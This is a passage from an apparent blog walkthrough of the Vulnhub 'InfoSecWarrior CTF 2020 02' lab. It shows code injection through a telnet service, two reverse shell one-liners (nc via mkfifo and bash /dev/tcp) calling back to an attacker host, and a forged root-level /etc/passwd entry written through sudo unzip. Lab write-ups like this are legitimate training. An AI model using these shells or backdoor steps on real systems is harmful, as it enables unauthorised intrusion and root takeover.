Vulnhub – InfoSecWarrior CTF 2020 02 Walkthrough

Scanning the box with nmap –A –T4 –p- 192.168.1.18 –vv

Connecting to port 56563 with telnet:

Ok there is a trick to it, we can use a command instead of a number:

__import__(‘os’).system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444>/tmp/f’)

And on our listening port we get a shell:

We escape the shell with command python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ and then we view the file bla2-note:

The pass czNjcjN0 is a base64 code which translate to s3cr3t, now let’s view the /etc/group file:

The password didn’t work with bla or ck04, ok we still have ssh service let’s take a look at it:

The password didn’t work either, but this might work … cat /etc/*-release gave us:

The CODENAME=bionic as the banner said “Enumerate Hostname and Distro’s codename of this box And try to get Secure Shell” now we use bionic as the password:

Ok that’s weird we got the user flag but we got kicked out so let’s try this we going to write bash –p:

Yes it worked, but we got stuck as no commands is displaying results so we going to make another reverse shell using bash -i >& /dev/tcp/192.168.1.11/1234 0>&1

Now user ck04 got sudo privilege:

And the user bla got sudo privilege too:

Ok now we are going to add a new user with a root privilege to the passwd file in the /etc:

Now we copy the /etc/passwd to our location in bla home directory and edit it and put inside it

hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash

Now we going to use the unzip command that we got from sudo –l, first we zip it and then unzip it:

Now we su hacker and the password is 123456

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s